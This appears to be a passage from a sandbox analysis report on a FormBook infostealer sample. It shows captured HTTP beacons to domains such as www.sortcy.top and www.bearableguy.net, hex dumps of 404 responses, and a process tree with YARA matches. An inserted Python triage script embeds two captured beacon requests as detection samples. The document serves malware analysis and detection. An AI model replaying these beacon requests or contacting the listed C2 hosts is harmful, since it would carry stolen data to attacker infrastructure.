                                                          Nov 5, 2024 15:44:38.993796110 CET | 1236 | IN | Data Raw: 6c 2e 30 32 37 2d 2e 30 35 33 63 2e 30 36 2d 2e 31 31 34 2e 30 38 33 2d 2e 32 36 36 2d 2e 30 32 35 2d 2e 33 37 32 4d 31 30 36 2e 37 39 38 20 32 32 2e 32 32 63 2d 2e 31 30 37 2d 2e 32 39 32 2d 2e 37 35 37 2d 2e 33 30 34 2d 2e 37 39 34 2e 30 32 38
                                                          Data Ascii: l.027-.053c.06-.114.083-.266-.025-.372M106.798 22.22c-.107-.292-.757-.304-.794.028-.032.293.107.618.488.731.229.068.532-.032.507-.257-.021-.186-.137-.329-.201-.502M70.884 28.197c-.13-.291-.716-.24-.83.025-.131.304-.034.606.41.754.101.033.24.03


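The sessions to www.sortcy.top in this report share one shape: a POST (sessions 30 and 31) or a GET (session 32) to /sm4f/ carrying a single short-named parameter, H0kxIVc, whose value is a long base64-looking blob; an Origin and Referer that point back at the very URL being hit; Connection: close together with Cache-Control: max-age=0; and a 2009-era Mac OS X Firefox 3.5.3 User-Agent sent by a Windows binary running from Program Files (x86), over plain HTTP on port 80. The server answers every request with the same 13840-byte Apache 404 page, which says nothing about whether the host is live: FormBook beacons to decoy domains alongside its real C2, so the signal is in the request, not the response. The triage script below is an added example and is not part of the Joe Sandbox report or any vendor signature; the indicator names, the three-indicator verdict rule and the benign control request are the author's own constructions. It embeds the session 30 and session 32 requests as captured (the Accept* headers, which it ignores, are left out).

```python
"""Heuristic triage of the /sm4f/ beacons captured in sessions 30-32.
Added example, not from the sandbox report: indicator names, the
three-indicator verdict and the benign control are the author's choices."""
import re

# Copied from the report (sessions 30 and 32). Accept* headers omitted;
# the session 30 body is the full 224-byte form body shown in the report.
SESSION_30_POST = (
    "POST /sm4f/ HTTP/1.1\r\n"
    "Host: www.sortcy.top\r\n"
    "Origin: http://www.sortcy.top\r\n"
    "Referer: http://www.sortcy.top/sm4f/\r\n"
    "Cache-Control: max-age=0\r\n"
    "Content-Length: 224\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Connection: close\r\n"
    "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; "
    "rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3\r\n"
    "\r\n"
    "H0kxIVc=JYssoh3iqCXcJJtbvbrYFEGk5UlekMWsq+6JnrmzSXP6C4xupwR48SzOlDNu"
    "dPbl2QIKphTXOM44f6YnUJ02+tWzycNu6YJNfz/RB+vbgYAJZy8PIFArt1xi"
    "urEDMHwSVt+MYtRhReUzW+iFYxl5TR/XwNySry0d9wpBjLCdAbp4rHQYyvSs"
    "Hm7JSL5a09SCt2nSNUj+QPMJpRMY6+Thez8="
)
SESSION_32_GET = (
    "GET /sm4f/?Ot=J0UP4Hshc&H0kxIVc=EaEMrXPp8wHqWJVBhtHqF3+v/VQY0/i9nv6TiqWB"
    "PFHSbs8QlWt2xVXVrkxIfcrF7TYepETuHZ89BYJlBcojqP6ggOEAyvBHZWGMGsHph5U7SQ"
    "47QEw+uXM= HTTP/1.1\r\n"
    "Host: www.sortcy.top\r\n"
    "Connection: close\r\n"
    "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; "
    "rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3\r\n"
    "\r\n"
)
# Constructed benign control (not from the report): a current browser
# submitting a login form over TLS from a Windows host.
BENIGN_POST = (
    "POST /session HTTP/1.1\r\n"
    "Host: app.example.com\r\n"
    "Origin: https://app.example.com\r\n"
    "Referer: https://app.example.com/login\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 33\r\n"
    "Connection: keep-alive\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) "
    "Gecko/20100101 Firefox/128.0\r\n"
    "\r\n"
    "username=alice&password=s3cret%21"
)


def parse_request(raw):
    """Split one HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def form_params(method, target, body):
    """(key, value) pairs from the query (GET) or body (POST), kept raw:
    a browser percent-encodes '+', '/' and '=' inside a form value, so
    seeing them unencoded is itself a sign of a hand-rolled client."""
    data = body if method == "POST" else target.partition("?")[2]
    return [tuple(item.partition("=")[::2]) for item in data.split("&") if item]


B64 = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def looks_opaque_b64(key, value):
    """Short alphanumeric key carrying a long, 4-aligned base64 blob."""
    return (re.fullmatch(r"[A-Za-z0-9]{1,8}", key) is not None
            and len(value) >= 64 and len(value) % 4 == 0
            and B64.fullmatch(value) is not None)


def triage(raw, dst_port, process_is_windows):
    """Return the indicator names one request trips. dst_port and
    process_is_windows come from the session table (port 80, a Windows
    binary under Program Files (x86)), not from the request itself."""
    method, target, h, body = parse_request(raw)
    hits = []
    ua = h.get("user-agent", "")
    if process_is_windows and "Macintosh" in ua and "Firefox/3." in ua:
        hits.append("legacy_mac_ua_from_windows")  # 2009 Gecko, wrong OS
    host, path = h.get("host", ""), target.partition("?")[0]
    origin = h.get("origin", "")
    # Origin is the destination and Referer is exactly the URL being hit.
    if origin.endswith("://" + host) and h.get("referer") == origin + path:
        hits.append("self_referential_origin_referer")
    if h.get("connection", "").lower() == "close" and h.get("cache-control") == "max-age=0":
        hits.append("one_shot_no_cache")
    if any(looks_opaque_b64(k, v) for k, v in form_params(method, target, body)):
        hits.append("opaque_b64_param")
    if dst_port == 80:
        hits.append("cleartext_http")
    return hits


def flagged(hits):
    """Author's verdict rule: three independent tells."""
    return len(hits) >= 3


if __name__ == "__main__":
    for name, raw, port in (("session 30", SESSION_30_POST, 80),
                            ("session 32", SESSION_32_GET, 80),
                            ("benign control", BENIGN_POST, 443)):
        hits = triage(raw, port, process_is_windows=True)
        print(f"{name}: flagged={flagged(hits)} {hits}")
```

Run it directly to see which indicators each request trips. In a pipeline you would feed it requests reassembled from a proxy log or Zeek http.log and keep the verdict a triage hint rather than a block decision: a Referer equal to the POST target and max-age=0 also occur in ordinary form submissions, which is why the rule demands three tells and why the benign control trips none.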
                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          32 | 192.168.2.4 | 50035 | 184.94.215.26 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 5, 2024 15:44:40.796757936 CET | 445 | OUT | GET /sm4f/?Ot=J0UP4Hshc&H0kxIVc=EaEMrXPp8wHqWJVBhtHqF3+v/VQY0/i9nv6TiqWBPFHSbs8QlWt2xVXVrkxIfcrF7TYepETuHZ89BYJlBcojqP6ggOEAyvBHZWGMGsHph5U7SQ47QEw+uXM= HTTP/1.1
                                                          Host: www.sortcy.top
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Nov 5, 2024 15:44:41.510539055 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 05 Nov 2024 14:44:41 GMT
                                                          Server: Apache
                                                          Content-Length: 13840
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                                          Nov 5, 2024 15:44:41.510677099 CET | 1236 | IN | Data Raw: 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 58 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a
                                                          Data Ascii: nsform: rotateX(30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}
                                                          Nov 5, 2024 15:44:41.510689974 CET | 1236 | IN | Data Raw: 31 39 36 2d 34 2e 31 2d 32 35 2e 37 2d 31 2e 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d
                                                          Data Ascii: 196-4.1-25.7-1.774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.71
                                                          Nov 5, 2024 15:44:41.510701895 CET | 1236 | IN | Data Raw: 39 20 32 30 2e 38 20 36 35 2e 31 37 35 20 32 31 2e 30 32 20 35 33 2e 31 35 2e 32 32 35 20 36 39 2e 31 38 38 2d 31 35 2e 36 38 35 20 37 30 2e 35 39 2d 31 38 2e 39 37 37 20 32 2e 36 30 35 2d 36 2e 31 31 38 20 31 2e 38 33 38 2d 32 31 2e 33 32 37 2e
                                                          Data Ascii: 9 20.8 65.175 21.02 53.15.225 69.188-15.685 70.59-18.977 2.605-6.118 1.838-21.327.06-22.283-1.777-.956-44.044-3.204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34
                                                          Nov 5, 2024 15:44:41.510714054 CET | 848 | IN | Data Raw: 20 33 2e 32 38 39 20 31 2e 34 35 38 20 32 31 2e 32 33 39 20 36 2e 30 34 37 20 34 32 2e 39 38 39 20 36 2e 36 37 33 20 32 31 2e 37 35 2e 36 32 35 20 35 37 2e 31 32 36 2d 31 2e 36 37 39 20 36 37 2e 34 32 2d 35 2e 34 35 38 20 39 2e 38 30 36 2d 33 2e
                                                          Data Ascii: 3.289 1.458 21.239 6.047 42.989 6.673 21.75.625 57.126-1.679 67.42-5.458 9.806-3.598 13.662-7.027 15.493-5.228 2.396 2.351 1.687 8.008-4.913 12.215-6.252 3.985-27.53 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161
                                                          Nov 5, 2024 15:44:41.510787964 CET | 1236 | IN | Data Raw: 2d 2e 36 32 39 2e 36 31 36 2d 2e 39 34 32 2e 32 34 33 2d 2e 33 36 33 2e 36 33 2d 2e 36 37 35 2e 37 36 37 2d 31 2e 30 36 34 2e 31 37 33 2d 2e 34 38 36 2d 2e 37 35 33 2d 2e 39 33 2d 31 2e 34 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32
                                                          Data Ascii: -.629.616-.942.243-.363.63-.675.767-1.064.173-.486-.753-.93-1.43-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.40
                                                          Nov 5, 2024 15:44:41.510799885 CET | 1236 | IN | Data Raw: 31 2e 37 31 33 2d 2e 37 31 32 2d 32 2e 37 32 37 2d 2e 34 37 39 2d 2e 33 37 2e 30 38 35 2d 2e 32 34 2e 33 31 35 2e 30 34 34 2e 33 39 36 2e 36 30 31 2e 31 37 33 20 31 2e 31 36 38 2e 34 30 38 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31
                                                          Data Ascii: 1.713-.712-2.727-.479-.37.085-.24.315.044.396.601.173 1.168.408 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791
                                                          Nov 5, 2024 15:44:41.510941982 CET | 1236 | IN | Data Raw: 2d 2e 31 35 34 2e 32 34 33 2e 36 32 32 2e 33 35 37 2e 39 32 35 2e 31 37 33 2e 32 32 37 2d 2e 30 35 31 2e 34 34 34 2d 2e 31 30 34 2e 37 30 35 2d 2e 31 33 2e 35 32 31 2d 2e 30 35 34 20 31 2e 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35
                                                          Data Ascii: -.154.243.622.357.925.173.227-.051.444-.104.705-.13.521-.054 1.021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.3
                                                          Nov 5, 2024 15:44:41.510953903 CET | 1236 | IN | Data Raw: 32 2e 33 38 2d 31 2e 31 32 36 2e 35 32 32 2d 31 2e 37 34 31 2e 31 33 39 2d 2e 36 30 35 2d 2e 32 30 34 2d 31 2e 33 39 33 2d 2e 34 37 2d 2e 39 33 33 4d 31 30 33 2e 39 37 37 20 38 2e 38 36 33 63 2d 2e 32 36 35 2d 31 2e 31 37 37 2d 31 2e 34 37 37 2d
                                                          Data Ascii: 2.38-1.126.522-1.741.139-.605-.204-1.393-.47-.933M103.977 8.863c-.265-1.177-1.477-2.153-2.51-1.784-.548.195-.653 1.156-.104 1.442.294.153.53.397.762.655.326.36.549.611.988.784.564.223.992-.535.864-1.097M100.988 4.781c.03-.437-.169-.702-.568-.7
                                                          Nov 5, 2024 15:44:41.510965109 CET | 848 | IN | Data Raw: 30 37 39 2d 2e 34 39 39 2d 2e 31 35 33 2d 2e 39 37 36 2d 2e 32 36 34 2d 31 2e 34 34 35 2d 2e 32 30 35 2d 2e 38 36 2d 2e 38 35 33 2d 2e 31 37 34 2d 2e 36 38 39 2e 37 33 2e 30 38 39 2e 34 39 2e 31 34 38 2e 39 38 32 2e 32 35 20 31 2e 34 36 2e 31 39
                                                          Data Ascii: 079-.499-.153-.976-.264-1.445-.205-.86-.853-.174-.689.73.089.49.148.982.25 1.46.196.907.849.182.703-.745M78.957 24.496c.068-.31.05-.616-.02-.91-.077-.321-.14-.65-.183-1.002-.099-.82-.671-.76-.736.076-.056.71.019 1.361.23 1.918.132.348.265.461.
                                                          Nov 5, 2024 15:44:41.515769005 CET | 1236 | IN | Data Raw: 38 2d 31 2e 37 33 35 20 35 2e 31 39 37 2d 34 2e 34 37 36 20 35 2e 34 37 2d 32 2e 37 34 38 2e 32 37 34 2d 35 2e 31 39 39 2d 31 2e 37 33 32 2d 35 2e 34 37 36 2d 34 2e 34 38 2d 2e 32 37 2d 32 2e 37 34 38 20 31 2e 37 33 35 2d 35 2e 31 39 37 20 34 2e
                                                          Data Ascii: 8-1.735 5.197-4.476 5.47-2.748.274-5.199-1.732-5.476-4.48-.27-2.748 1.735-5.197 4.483-5.47 2.748-.274 5.192 1.733 5.469 4.48M93.976 28.505c.27 2.748-1.735 5.197-4.483 5.47-2.748.273-5.192-1.733-5.469-4.48-.27-2.748 1.735-5.197 4.483-5.47 2.748


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          33 | 192.168.2.4 | 50036 | 3.33.130.190 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 5, 2024 15:44:47.430522919 CET | 724 | OUT | POST /m3fv/ HTTP/1.1
                                                          Host: www.bearableguy.net
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.bearableguy.net
                                                          Referer: http://www.bearableguy.net/m3fv/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 6d 44 4c 37 77 78 53 77 4c 76 68 57 2b 73 57 30 52 33 68 4e 68 65 65 75 53 43 7a 76 6e 42 53 38 47 2b 48 76 74 71 56 4b 7a 67 75 6c 4a 66 47 6d 52 68 6d 36 50 6e 55 70 30 62 31 39 72 59 77 52 48 33 74 4b 39 72 6c 42 54 6a 54 49 78 52 43 73 77 73 44 58 61 77 32 4b 45 38 37 47 44 67 32 57 6e 66 6d 38 64 65 54 78 63 58 70 46 31 32 50 6c 30 75 2b 71 59 50 52 33 6e 71 7a 42 67 4e 61 62 44 61 6b 2f 31 43 55 2f 56 31 6d 63 7a 6f 4e 54 41 32 5a 35 30 58 4d 56 34 67 46 35 77 36 61 69 6e 74 66 79 51 32 43 4d 4b 35 4c 32 6a 61 62 33 77 50 68 55 73 73 58 34 67 74 32 50 41 6b 64 39 50 67 3d 3d
                                                          Data Ascii: H0kxIVc=mDL7wxSwLvhW+sW0R3hNheeuSCzvnBS8G+HvtqVKzgulJfGmRhm6PnUp0b19rYwRH3tK9rlBTjTIxRCswsDXaw2KE87GDg2Wnfm8deTxcXpF12Pl0u+qYPR3nqzBgNabDak/1CU/V1mczoNTA2Z50XMV4gF5w6aintfyQ2CMK5L2jab3wPhUssX4gt2PAkd9Pg==


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          34 | 192.168.2.4 | 50037 | 3.33.130.190 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 5, 2024 15:44:49.970905066 CET | 744 | OUT | POST /m3fv/ HTTP/1.1
                                                          Host: www.bearableguy.net
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.bearableguy.net
                                                          Referer: http://www.bearableguy.net/m3fv/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 6d 44 4c 37 77 78 53 77 4c 76 68 57 38 4a 65 30 54 57 68 4e 6e 2b 65 76 4c 43 7a 76 74 68 53 34 47 2f 37 76 74 6f 35 61 7a 53 36 6c 4b 36 69 6d 51 6c 79 36 4f 6e 55 70 36 37 30 33 6d 34 78 64 48 32 51 70 39 70 78 42 54 6e 44 49 78 55 2b 73 77 61 4c 57 62 67 32 49 4e 63 37 45 4d 41 32 57 6e 66 6d 38 64 65 48 66 63 58 68 46 31 47 66 6c 6d 63 57 72 44 76 52 34 74 4b 7a 42 71 74 61 48 44 61 6b 42 31 44 4a 51 56 7a 69 63 7a 71 56 54 41 6e 5a 36 36 58 4d 54 6c 77 45 32 2f 37 71 75 68 49 57 61 61 77 71 2b 47 4b 4b 58 6d 63 4b 74 68 2b 41 44 2b 73 7a 4c 39 71 2f 37 4e 6e 67 30 55 6a 6d 77 48 6e 75 37 55 59 6c 5a 53 59 4d 64 65 33 31 6b 61 59 41 3d
                                                          Data Ascii: H0kxIVc=mDL7wxSwLvhW8Je0TWhNn+evLCzvthS4G/7vto5azS6lK6imQly6OnUp6703m4xdH2Qp9pxBTnDIxU+swaLWbg2INc7EMA2Wnfm8deHfcXhF1GflmcWrDvR4tKzBqtaHDakB1DJQVziczqVTAnZ66XMTlwE2/7quhIWaawq+GKKXmcKth+AD+szL9q/7Nng0UjmwHnu7UYlZSYMde31kaYA=


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          35 | 192.168.2.4 | 50038 | 3.33.130.190 | 80 | 2816 | C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 5, 2024 15:44:52.518520117 CET | 10826 | OUT | POST /m3fv/ HTTP/1.1
                                                          Host: www.bearableguy.net
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.bearableguy.net
                                                          Referer: http://www.bearableguy.net/m3fv/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 10304
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 6d 44 4c 37 77 78 53 77 4c 76 68 57 38 4a 65 30 54 57 68 4e 6e 2b 65 76 4c 43 7a 76 74 68 53 34 47 2f 37 76 74 6f 35 61 7a 54 43 6c 4a 4d 75 6d 51 45 79 36 63 58 55 70 6b 72 30 32 6d 34 78 55 48 33 34 31 39 70 74 37 54 68 66 49 77 32 6d 73 79 6f 6a 57 53 67 32 49 53 4d 37 46 44 67 32 35 6e 66 32 34 64 65 58 66 63 58 68 46 31 45 58 6c 6c 4f 2b 72 45 66 52 33 6e 71 7a 46 67 4e 61 6a 44 61 73 33 31 44 39 36 56 44 43 63 7a 4b 46 54 4e 31 78 36 6c 48 4d 52 6b 77 46 70 2f 37 6e 77 68 49 69 34 61 30 6a 6a 47 4e 36 58 71 62 2f 73 2b 62 68 63 6f 75 76 34 6a 71 76 76 49 58 45 74 63 67 71 7a 41 45 4f 2f 4f 62 46 7a 61 50 74 6e 4d 56 64 45 4f 63 30 53 78 54 58 39 6c 37 71 53 4f 43 65 4f 51 65 53 43 30 76 44 37 72 6e 65 31 51 78 61 57 73 7a 35 71 69 45 75 53 62 62 51 54 2f 65 41 64 32 6e 48 2b 52 71 55 37 75 68 46 68 68 73 51 49 78 7a 73 55 6a 68 43 56 65 65 2f 4c 64 4c 4d 47 39 35 56 53 49 4c 72 5a 57 4b 39 53 75 44 37 6d 4d 37 45 4a 38 71 36 2b 78 36 79 56 51 63 58 57 4b 53 37 5a 6f 7a [TRUNCATED]
                                                          Data Ascii: H0kxIVc= [TRUNCATED]


                                                          Target ID:0
                                                          Start time:09:41:47
                                                          Start date:05/11/2024
                                                          Path:C:\Users\user\Desktop\H1CYDJ8LQe.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\H1CYDJ8LQe.exe"
                                                          Imagebase:0x400000
                                                          File size:1'517'995 bytes
                                                          MD5 hash:8AFEAE6EC5433E3F0C6903FC107FA851
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:09:41:48
                                                          Start date:05/11/2024
                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\H1CYDJ8LQe.exe"
                                                          Imagebase:0x590000
                                                          File size:46'504 bytes
                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1863259155.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1863259155.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1863781996.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1863781996.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1862646981.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1862646981.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:09:41:57
                                                          Start date:05/11/2024
                                                          Path:C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe"
                                                          Imagebase:0x4b0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3527390754.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.3527390754.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:3
                                                          Start time:09:41:58
                                                          Start date:05/11/2024
                                                          Path:C:\Windows\SysWOW64\dvdplay.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\dvdplay.exe"
                                                          Imagebase:0xfa0000
                                                          File size:10'240 bytes
                                                          MD5 hash:D388610A1DE600E01277AECF3B1280A3
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3525954237.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3525954237.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3527070490.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
